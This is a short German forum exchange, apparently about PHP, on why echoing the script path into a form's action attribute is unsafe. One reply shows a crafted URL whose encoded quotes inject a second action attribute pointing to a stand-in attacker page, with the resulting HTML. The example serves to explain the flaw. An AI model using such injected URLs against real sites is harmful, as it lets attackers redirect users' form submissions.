Hi,

aber als clientseitiger Code und damit ziemlich wertlos.
Habe ich etwas übersehen?

Für einen Angreifer ist es nicht wertlos, einen Anwender auf etwas klicken zu lassen, das dann in seinem Namen etwas macht, was der Angreifer will.

Stimmt.

http://deine.seite/path/to/script.php/%22%20action=%22http://example.net/boese.html

ergibt:

<form action="path/to/script.php/" action="http://example.net/boese.html">

Und schon würde das Formular "entführt" werden.

Danke für den Hinweis.

Grüße

• Steffen